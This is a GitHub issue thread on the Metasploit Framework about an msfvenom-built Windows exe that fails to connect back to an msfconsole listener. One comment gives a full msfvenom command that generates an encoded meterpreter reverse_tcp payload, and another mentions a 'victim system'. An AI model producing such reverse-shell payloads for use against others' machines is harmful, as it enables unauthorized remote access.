### ISSUE TITLE
Msfconsole listner not creating any connection with the payload

### ISSUE THREAD

**Issue by ayzikhn992** [rapid7/metasploit-framework#12117]
## Steps to reproduce

I Tried to create an exe on msfvenom also i tried some other scripts like Hacktheworld,fatrat and some other.

Than i started msfconsole with the rc file for the exe

When my listener starts for the rc file , it doenst create any connection with my exe file. Even though i checked the port its opened and working fine, payload created properly everything is fine but instead of this all my exe isnt creating any connection to my listner rc file.

This issue has started like after i have updated my kali linux to 2019. Before that it was working fine.

Can anyone help me out with this? Or anyone else facing same issue?

**Comment by gnu-like** [comment]
@ayzikhn992 If you are sure your exe payload run in victim system check these:
`msfdb delete`
`msfdb init`
by the way check `~/.msf4/logs/framework.log` for giving more information

**Comment by ayzikhn992** [comment]
thank you for replying. Yes i have also tested it on my other windows system in order properly but connection isnt coming.

**Comment by gnu-like** [comment]
> thank you for replying. Yes i have also tested it on my other windows system in order properly but connection isnt coming.

make new payload :`msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST = 192.168.X.X LPORT=XXX -b "\x00" -e x86/shikata_ga_nai -f exe > test.exe 
`

**Comment by ayzikhn992** [comment]
@gnu-like  already tried this. There is some issue with the lisnter because when i check my port on canyouseeme it shows that my port is on but when i try to run my exe on other system i get no response, this started happening after i update my linux to latest version. It was working fine until march update

**Comment by space-r7** [comment]
Hi @gnu-like, could you post output from your Framework log file? Also, have you tried viewing network traffic to see if a connection is being attempted?

**Comment by gnu-like** [comment]
Hi @space-r7 this issue is for @ayzikhn992 my issue is about android webcam_snap [here](https://github.com/rapid7/metasploit-framework/issues/12114)

**Comment by gnu-like** [comment]
Hi @space-r7 this is @ayzikhn992's issue my issue is about android webcam_snap [here](https://github.com/rapid7/metasploit-framework/issues/12114)

**Comment by space-r7** [comment]
> Hi @space-r7 this is @ayzikhn992's issue my issue is about android webcam_snap [here](https://github.com/rapid7/metasploit-framework/issues/12114)

Oops, let me fix that!
